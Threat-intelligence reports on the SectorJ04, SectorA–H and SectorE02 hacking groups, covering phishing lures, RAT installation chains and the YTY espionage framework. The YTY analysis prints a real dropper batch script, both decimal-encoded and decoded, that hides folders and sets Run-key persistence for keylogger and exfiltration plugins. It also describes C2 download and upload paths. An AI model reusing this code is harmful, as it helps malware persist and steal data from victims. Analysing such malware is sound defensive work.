Until 2019, SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit, and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019.

This allows them to expand their range of targets of hacking activities for financial profit, and in this regard, SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019.

They eventually hacked the Active Directory (AD) server and took control of the entire corporate internal network, and then distributed the Clop ransomware on the AD server. From the hacking activity, we also found malware for collecting email information and “AmadeyBot”, a botnet malware that which has its source code available in Russia’s underground forums.

Figure 19 Spear phishing email used for hacking activities targeting AD servers in South Korea

They are believed to have continuously attempted to hack into companies in South Korea to distribute Clop ransomware. Attackers used spam emails disguised as being sent by the National Tax Service in May to install FlawedAmmy RAT in the infected system, during which the Clop ransomware was found using the same certificate as the FlawedAmmy RAT executable file.

Figure 20 Spear phishing email disguised as tax bill

The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam.

Major Malware Installation Types

The following describes three types of backdoor infections that are installed from malicious documents identified in the SectorJ04 group-related hacking cases that occurred during the first half of 2019.

Type 1 – Using encoded executable file

SectorJ04 group carried out intensive hacking on various industrial sectors, including South Korea’s media, manufacturing and universities, around February and March 2019. They used the spear phishing email to spread malicious Excel or malicious Word files, and downloaded the MSI files from the attacker’s server when the malicious documents were run.

The MSI file installs a downloader that downloads FlawedAmmy RAT encoded in the infection system from the attacker server, and the downloaded FlawedAmmy RAT registers an automatic execution under the name “wsus.exe.”

Figure 21 Type of backdoor installation to install encoded executable file Type 1

FlawedAmmy RAT performs remote control functions in the infected system and decodes encoded executable files downloaded from the attacker server using certain hard-coded strings. It also has a function to check if a particular process is running to determine whether their malware should be executed.

Figure 22 “Ammy Admin” string found in FlawedAmmy RAT
Figure 23 Part of decode code that uses hard-coded strings

Type 2 – Using NSIS Script

SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019. Malicious documents delivered through the spear phishing email downloaded the MSI file, which forwards the NSIS Installer to the infected system. The NSIS script executes the final payload, ServHelper, in the DLL file format, using “rundll32.exe”.

Note that NSIS (Nullsoft Scriptable Install System) is a script-based installation system for Windows and is a lightweight installation system supported by Nullsoft.

Figure 24 Backdoor installation type utilizing NSIS Installer Type 2

Decompressing the NSIS installer installed by the MSI file shows that it consists of an NSIS script with an NSI extension, a ServHelper in the DLL file format, and a “ncExec.dll,” the normal DLL required to run the NSIS.

Figure 25 Uncompressed NSIS installer
Figure 26 Part of the NSIS script for running ServHelper in the DLL file format

ServHelper performs the function of the backdoor in the infection system and sends specific types of responses to C2 servers using delimiters such as “key,” “sysid,” and “resp”. Different types of delimiters are sometimes found depending on malware.

Figure 27 ServHelper Backdoor C2 Communication Code Partial

Type 3 – Using Self-Extracting File

SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019. Malicious documents delivered through the spear phishing email pass MSI files to the infection system, and MSI files download the executable self-extracting file (SFX). When the SFX file is executed, another SFX file inside is executed and the final payload, RMS RAT, is delivered to the infected system.

Figure 28 Backdoor installation type utilizing SFX executable files Type 3

Within the first SFX file to be downloaded by the MSI file, there are four files. When executing an SFX file, it uses a command to change the extension of the SFX file (“kernel.dll”) of the DLL extension to EXE and decompress it using a hard-coded password. The files that make up the SFX file vary from malware to malware.

Figure 29 The first SFX file to be downloaded from an MSI file
Figure 30 “i.cmd” for decompression of the second SFX file

Four files can be seen in the second SFX file that has been decompressed, and as before, running “exit.exe”. “exit.exe” executes the same “i.cmd” as before, which executes an RMS RAT with the file name “winserv.exe” in the registry. RMS RAT is a legitimate remote management software created in Russia, and files with DAT extensions contain configuration information to run the RMS RAT.

Figure 31 Configuring a second SFX file disguised as a DLL file extension
Figure 32 RMS RAT configuration file with a DAT extension

SectorJ04 Group Activity in South Korea

The following is about the activities of the SectorJ04 group found in South Korea in July and August 2019.

Hacking activities disguised as electronic tickets by large airlines

In late July, SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education, job openings, real estate and semiconductors in South Korea. Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity.

Figure 33 Spam email disguised as electronic tickets

They used spam emails disguised as those sent by large South Korean airlines and used ISO-format files as attachments. The group used the same body contents of the email to deliver spam emails to multiple hacking targets.

Decompressing the ISO file attached to the spam email would show an SCR file disguised as a “.pdf” extension exists, which is a .NET executable file that downloads an MSI file. The ISO files sometimes contain LNK files, which, like the malware written in .NET, download an MSI files from a remote location.

Figure 34 A disguised SCR file identified within an ISO file
Figure 35 MSI file downloader written as .NET
Figure 36 Disguised LNK file identified within ISO file

The following valid digital signatures were found in the MSI file downloaded from the attacker server. Other digital signatures were also found issued by “HAB CLUB LT” and “LUK 4 TRANSPORT LT”.

Figure 37 Digital signature information for MSI files found in hacking activities

Finally, FlawedAmmy RAT is downloaded from the remote server and the activity uses a Base64 encoded Powershell script to determine if the infected system is a PC contained in an Active Directory Domain.

Figure 38 Powershell script to determine if a PC belongs to a domain

Hacking activity using same email content as the past

In early August, the SectorJ04 group carried out extensive hacking activities targeting the users around the world, including South Korea, India, Britain, the United States, Germany, Canada, Argentina, Bangladesh and Hong Kong.

Their activities were particularly heavy in healthcare-related areas such as healthcare, pharmaceuticals, biotechnology and healthcare-wage management, as well as energy-related companies such as gas and wind power. Also, they continued their attacks on preexisting hacking target areas such as manufacturing, distribution and retail.

The contents of the text written in French and English were found in the spam email, and an MS Word file with random numbers was used as an attachment. All emails found in the hacking activity had the same text content.

Figure 39 Spear phishing emails written in French and English

Spam emails in Korean were also identified in the hacking activity, indicating that the contents of the text of the email used in the hacking activity were reused in June. Attached file is an MS Word file titled “스캔_(random number).doc”.

Figure 40 Spear phishing email targeted to South Korea using the same text used in the past

The MS Word file used as an attachment is disguised as an order confirmation and a goods receipt. Running the macro from the document would allow the downloader with the DLL file format to run using “rundll32.exe”. The downloader downloads FlawedAmmy RAT from the attacker server and runs under the name “rundl32.exe”.

Figure 41 Malicious document execution screen disguised as order confirmation
Figure 42 Malicious document execution screen for Korea language users disguised as a receipt of goods
Figure 43 Part of the macro script included in the malicious document

FlawedAmmy RAT found in the hacking activity showed the existing “Ammyy Admin” string being modified to “Popss Admin” and created Mutex with “KLGjigjuw4j892358u432i5”. In addition, the compile path “c:\\123\\123\\clear\\ammyygeneric\\target\\TrFmFileSys.h” was found inside the file.

Figure 44 Change hard-coded string information in FlawedAmmy RAT
Figure 45 Mutex generation code using hard-coded string information

In addition to the above mentioned changes in the FlawedAmmy RAT found in the most recent hacking activity, other changes such as changes in their string decoding were identified.

Conclusion

The SectorJ04 group’s range of targets increased sharply in 2019, and they appear to be striving to carry out elaborated attacks while at the same time targeting indiscriminately. They are one of the most active cyber crime groups in 2019, and they often modify and tweak their hacking methods and perform periodic hacking activities.

The SectorJ04 group’s hacking activities are expected to continue to increase, and the ThreatRecon team will continue to monitor the attack activity against the group.

Indicators of Compromise

IoCs of the SectorJ04 group included in the report can be found here.

More information about the SectorJ04 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Spearphishing Attachment
Spearphishing Link
Trusted Relationship

Execution

Command-Line Interface
Execution through API
Execution through Module Load
Exploitation for Client Execution
PowerShell
Rundll32
Scheduled Task
Scripting
Service Execution
User Execution
Windows Management Instrumentation

Persistence

Account Manipulation
New Service
Registry Run Keys / Startup Folder
Scheduled Task
Startup items
System Firmware
Windows Management Instrumentation Event Subscription

Privilege Escalation

Bypass User Account Control
New Service
Scheduled Task
Startup items

Defense Evasion

Bypass User Account Control
Code Signing
Disabling Security Tools
DLL Side-Loading
Exploitation for Defense Evasion
Hidden Window
Modify Registry
Obfuscated Files or Information
Rundll32
Scripting
Software Packing
Virtualization/Sandbox Evasion

Credential Access

Account Manipulation
Input Capture
Input Prompt

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Share Discovery
Permission Groups Discovery
Process Discovery
Query Registry
Remote System Discovery
Security Software Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
System Service Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Remote Desktop Protocol
Remote Services

Collection

Automated Collection
Data from Local System
Email Collection
Input Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Custom Cryptographic Protocol
Data Encoding
Remote Access Tools
Standard Application Layer Protocol
Standard Cryptographic Protocol

Exfiltration

Automated Exfiltration
Data Compressed
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Intent

Data Encrypted for Impact

References

KRCERT – Analysis of Attacks on AD Server (2019.04.17)
https://www.krcert.or.kr/data/reportView.do?bulletin_writing_sequence=35006

Monthly Threat Actor Group Intelligence Report, June 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from May 21 to June 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, SectorA05 were found among SectorA hacking groups this June. The SectorA group was mainly active in the Middle East, Southeast Asia, and East Asia in June, targeting countries such as Jordan, Philippines, South Korea, and Japan.

The SectorA01 group mainly sent spear phishing emails to the Middle East and Southeast Asia which had Microsoft Office document files attached to them. However, in June, another case was discovered where they attached executable type malware that was disguised as a job application form.

The SectorA02 and SectorA05 groups are active mainly for monetary profit but based on their hacking techniques and malware features, each groups are aimed at different targets. The SectorA02 group mainly targets financial companies or companies related to cryptocurrency trading, but the SectorA05 group targets individuals who hold cryptocurrency. In the past, the two groups used spear phishing emails which attached malicious HWP or executable files. Recently, they have also used spear phishing emails impersonating cryptocurrency exchanges or government agencies.

Recently, the SectorA groups have been acting in parallel to target both diplomatic information related to their government and gain monetary benefits. In the past, they mainly targeted financial companies and cryptocurrency exchanges in order to earn monetary benefits. but nowadays they extended their range of hacking targets to include individual holders of cryptocurrency. Attention is needed as their range of activities expand.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In June, a total of six hacking groups were found to be active in SectorB. Activities of each group were found in the following countries: SectorB01 group activity was discovered in Southeast Asia and Europe, mainly in the Philippines, Netherlands, and Ukraine. SectorB03 group activity was discovered in the Middle East, mainly in Saudi Arabia. SectorB04 group activity was discovered in East Asia, Middle East and Europe, mainly in Taiwan, Philippines, Turkey, and Austria. SectorB06 group activity was discovered in the Middle East, mainly in Turkey and Kazakhstan. SectorB09 group activity was discovered in East Asia and North America, mainly in Japan, Hong Kong, Taiwan and Canada. SectorB14 group activity was discovered in East Asia and North America, mainly in the South Korea and the United States.

They maintain their existing hacking techniques – using Spear Phishing emails with malicious Microsoft Office document files attached. Recently, they also attacked Microsoft SharePoint servers and MySQL servers that are connected to the Internet using new vulnerabilities and web shells. In addition, new malware targeting the Linux operating system has been found.

In the past, SectorB groups focused more heavily on North America, but recently attacks in the Middle East, Southeast Asia and East Asia have also increased. We believe this is related to their recent political and diplomatic situations and it is likely that the hacking activities in the Middle East, Southeast Asia, East Asia will continue for the time being.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC08, SectorC11 were found among the SectorC groups in June. They were active mainly in Europe – Moldova, Ukraine and Germany – where they frequently have political friction with. They are constantly using spear phishing emails with malware, but there are gradual changes in the characteristics of the attached executable files. They continue to use open source programs such as the remote control programs, UltraVNC, and start to develop their malware with open source code. This is presumably done to bypass security solutions and analyst detection, and also interferes with intelligence analysis efforts to track attackers. SectorC groups are expected to continue hacking activities in countries which it has political and diplomatic conflicts with for the time being.

4. SectorD Activity Features

In June, a total of two hacking groups were found among SectorD groups. They targeted countries in the Middle East which they have a politically competitive relation with. Activities of each group were found in the following countries: SectorD02 group activity was discovered extensively in Middle Asia to Middle East, mainly in Hong Kong, Sweden, Tajikistan, United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, United States and Mexico. SectorD11 group activity was discovered in Middle Asia to Middle East.

They are constantly using spear phishing emails attached to Microsoft Office document files. In particular, obfuscated macro scripts and PowerShell code are embedded in these document files to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilian who are against SectorD government.

Currently, the SectorD hacking groups have increased the frequency of hacking activities against Western countries. This is mainly targeting the United States, which they have political and military disputes with, but also a pro-American nation in the Middle East. It is likely that the activities of SectorD hacking groups will be greatly dependent on how the US exerts its influence and military activities in the future.

5. SectorF Activity Features

The SectorF01 group was discovered performing hacking activities in Southeast Asia, Europe and North America, including Vietnam, United Kingdom and the United States. They have consistently used spear phishing emails with attached Microsoft Office document files, but recently attached compressed files containing obfuscated HTA script files as well. This bypasses the detection of security solutions using script-based malware and avoids making the target suspicious as it launches normal documents when running the HTA file.

Analysis of the recent hacking activity of SectorF01 shows they seem to have two purposes. The first is surveillance of organizations and individuals who are against their government. The second is the collection of high-tech info from advanced countries that are nurturing high-tech and industrial technologies, which assists their government’s economic development and upgrading purposes. Recently, the hacking activity of SectorF01 for the purpose of high-tech corporate espionage is increasing, and it is likely that their activities targeting high tech companies and countries will continue to increase in the future.

6. SectorH Activity Features

The SectorH01 group appears to be active as a contractor rather than belonging officially to a national security agency. Their hacking activities were found in Southeast Asia and South America, including India and Brazil. They mainly use spear phishing emails with Microsoft Office document files.

In this case, macro scripts within document files make use of PowerShell to download additional scripts from Pastebin (a text file storage site). This minimize the exposure of their next stage payload even if their initial malware is detected by a security solution, and can bypass the detection of security solution by using an external web site which is open to the Internet for distribution of their malware. SectorH01 group’s hacking activities were mainly carried out on their political competitor, India. However, recently their activities have been found in other regions, and we will continue monitoring them in order to further understand the purpose of the SectorH group.

7. Cyber Crime Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In June, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ01 group are mainly found in China, Germany, Slovenia, Sweden, Romania, Russia, US, Brazil, and Costa Rica. The SectorJ01 group uses Spear Phishing emails which have attached documents that utilize known code execution vulnerabilities in Microsoft Office. They also use Cobalt Strike, a common penetration testing tool.

SectorJ04 Group is one of the most active groups in recent years, and its activities have been found in a wide range of regions: Europe, Asia, North and South America, Africa. Specific countries include Switzerland, Russia, Macedonia, France, Ukraine, Italy, Germany, France, South Korea, Philippines, Taiwan, China, USA, Ecuador, and Senegal.

Similar to the past, they use spear phishing emails which have attached Microsoft Office document files with embedded macro scripts that will download malware. Sometimes they use HTML file attachments too. Recently, the SectorJ04 group hacked organizations such as universities, manufacturing companies, and construction companies, so their targets were not limited to just financial companies anymore. They have also extended their activities to industrial areas, where the security posture is typically relatively weaker compared to financial companies, so this is one way they are attempting to generate high profits through low effort. As SectorJ04 group’s hacking targets are diversified, it is likely that many cases of financial losses will occur in various countries across many industries.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government

Overview

From March to July this year, the ThreatRecon team noticed a spear phishing campaign by the SectorE02 group going on against the Government of Pakistan and organizations there related to defense and intelligence. Spear phishing emails are sent to their victims via Excel XLS files, which asks their victims to enable macros which will end up executing the downloader. Malicious document lures they have employed in recent times include a document purporting to be for registration for the Pakistan Air Force.

Security advisory by the Pakistan government regarding targeted attacks

SectorE02 is a threat actor which targets countries in South Asia, especially Pakistan, since at least 2012. Their arsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has a Windows and mobile version. Usage of this framework allows the SectorE02 group to constantly modify and even remake individual plugins of the framework, and pick and choose which plugins – if any – are sent to their victims. This modularity also allows the SectorE02 group to maintain low detections by antivirus engines because each module only does something simple and will not even work without certain previously dropped files. In this post, we will describe their lure document, first stage downloader, file plugin, screenshot plugin, keylogger plugin, and exfiltration uploader plugin.

Excel Spear Phishing

The excel file used by them had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls, and Agrani_Bank.xls. In some instances, it masqueraded as an Excel calculator from the National Bank of Pakistan.

Lure document 1

In later stages of the campaign, however, the group appeared to switch to using a MsgBox to show an error saying “This file is corrupted”.

Lure document 2

At the back, the excel macro would retrieve encoded data stored in itself, and the encoding here is just a simple decimal encoding with a comma (or exclamation mark) as a separator. The same encoding is used for the dropped executable, although more often one entire file is encoded as a zip archive containing two files – a batch script and executable which is then unzipped and executed.

All four files here are illustration copied files from the original “.txt”, “.pdf”, and “.inp” files which are actually executable binaries
Example Encoded Batch File in XLS Doc using Comma Separator
101,99,104,111,32,111,102,102,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,92,78,101,105,103,104,98,111,117,114,104,111,111,100,92,83,112,111,111,108,115,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,92,78,101,116,119,111,114,107,92,83,101,114,118,101,114,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,92,78,101,105,103,104,98,111,117,114,104,111,111,100,92,83,112,111,111,108,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,92,78,101,116,119,111,114,107,92,83,101,114,118,101,114,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,34,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,34,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,34,13,10,83,69,84,32,47,65,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,32,13,10,83,69,84,32,47,65,32,82,65,78,68,61,37,82,65,78,68,79,77,37,32,49,48,48,48,48,32,43,32,49,32,13,10,101,99,104,111,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,45,37,82,65,78,68,37,32,62,62,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,119,105,110,46,116,120,116,13,10,101,99,104,111,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,45,37,82,65,78,68,37,32,62,62,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,119,105,110,46,116,120,116,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,70,105,108,101,115,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,87,105,110,115,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,83,121,110,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,68,97,116,97,117,112,100,97,116,101,32,47,102,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,70,105,108,101,115,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,106,117,99,104,101,107,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,87,105,110,115,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,115,118,99,104,111,116,115,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,83,121,110,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,108,115,115,109,115,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,85,112,100,97,116,101,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,108,115,115,109,112,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,68,97,116,97,117,112,100,97,116,101,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,107,121,108,103,114,46,101,120,101,13,10,109,111,118,101,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,65,112,112,68,97,116,97,92,106,117,99,104,101,107,46,116,116,112,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,114,101,110,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,106,117,99,104,101,107,46,116,116,112,32,106,117,99,104,101,107,46,101,120,101,13,10,100,101,108,32,37,48

The dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive attributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or the autorun registry key. A text file containing the %COMPUTERNAME% variable and random digits will also be saved as “win.txt”, and this file is required for the executable downloader.

A dump showing the scheduled task created by the batch script

The batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store the text file containing the computer name, 2) to set up what we call the “common exfiltration folder” which each individual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.

Example Decoded Batch File in XLS Doc
/echo off rd /s /q %USERPROFILE%\Printers\Neighbourhood\Spools rd /s /q %USERPROFILE%\Print\Network\Server rd /s /q %USERPROFILE%\DriveData\Files rd /s /q %USERPROFILE%\DriveData\Wins md %USERPROFILE%\Printers\Neighbourhood\Spools md %USERPROFILE%\DriveData\Files md %USERPROFILE%\DriveData\Wins md %USERPROFILE%\Print\Network\Server attrib +a +h +s “%USERPROFILE%\DriveData” attrib +a +h +s “%USERPROFILE%\Printers” attrib +a +h +s “%USERPROFILE%\Print” SET /A %COMPUTERNAME% SET /A RAND=%RANDOM% 10000 + 1 echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Files\win.txt echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Wins\win.txt reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Files /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Wins /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigSyn /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Dataupdate /f reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Files /t REG_SZ /d %USERPROFILE%\DriveData\Wins\juchek.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Wins /t REG_SZ /d %USERPROFILE%\DriveData\Files\svchots.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigSyn /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssms.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigUpdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssmp.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Dataupdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\kylgr.exe move %userprofile%\AppData\juchek.ttp %userprofile%\DriveData\Wins ren %userprofile%\DriveData\Wins\juchek.ttp juchek.exe del %0

Downloader (b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)

Looking at the latest downloader executable which masquerades its filename as an InPage word document (bgfRdstr54sf.inp), it starts off by using CreateEventA as a mutex with the value “ab567” and only works if the file %USERPROFILE%\DriveData\Files\win.txt exists. It polls the C2 server every 100 or so seconds. It uses the fixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”, and performs a HTTPS GET against servicejobs[.]life/orderme/<computername>-<random>.

This is a change from their previous URL structure, “/orderme”, which contained the file(s) to be downloaded, and this allows them to cherry pick their victims – unless the SectorE02 operator specifically places the next stage malware in the server directory for a particular victim, that victim will only ever be infected with the downloader.

The downloader malware accepts three commands from the server, when the Content-Type response is “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”, which are used for saving files to disk or executing files/commands on the system. This is how the next stage downloader or plugins can be executed on the victim system.

Screenshot Plugin (f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)

This executable plugin takes a screenshot every two minutes using the Windows API to draw the raw screen bitmap to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. It then converts this raw bitmap to a JPG in a new file and deletes the raw bitmap file.

Code in the screenshot plugin creating the raw bitmap

The screenshot files are named in the format of “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon” [1].

Screenshot JPGs created by the screenshot plugin

Like some of the other YTY components, the obfuscated strings can be deobfuscated by running both the base64 and reverse string algorithm multiple (in this case, three) times.

The strings can be deobfuscated by running both the base64 and reverse algorithm three times

File Listing Plugin (d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)

This executable plugin recursively searches through the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives, looking for interesting file extensions shown below. Several default folders are avoided by the malware.

Note that the “.inp” extension is for “Urdu InPage”, a word processing program which supports languages such as Urdu which is the national language of Pakistan. The extensions the 2019 version of this plugin did not previously look for are “.odt” and “.eml”, and “.rft” is just a spelling mistake they made of “.rtf”.

The latest version of the plugin looks for files with containing any of 14 different file extensions

It only looks for files modified later than year 2017 and saves the text data of all matching files found in %APPDATA%\DriveData\Files\clist.log using the format of “File Path|Size WriteTimestamp l_flag”.

File path and names for exfiltration are saved to a clist.log file

A copy of these matching files are also saved to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The copied files are individually saved with the file names being the full file path to the copied file, with slashes becoming underscores.

Exact copies of files the plugin is looking for is saved to the common exfiltration folder

Keylogger Plugin (f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)

This plugin starts off by using CreateEventA as a mutex with the value “k4351”. It saves user keystrokes and which window title those keystrokes were pressed in the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The file is saved as “<username>_YYYY_MM_DD(HH_mm_ss).txt”.

Example of input captured by the keylogger plugin

Uploader Plugin (d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)

This plugin starts off by using CreateEventA as a mutex with the value “MyEvent3525” and only works if the file %USERPROFILE%\DriveData\Files\win.txt exists . While the other plugins dump their files into the common exfiltration folder, the uploader plugin takes the files from that folder and uploads it to the C2 server, which is the same server as the downloader C2 server. The uploaded files are deleted immediately after.

The uploader performs a HTTP POST to /upload/<computername> of the file using HTTP forms with the same hard coded user-agent as their downloader malware, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”.

Data sent to the C2 server through HTTPS for exfiltration

Summary

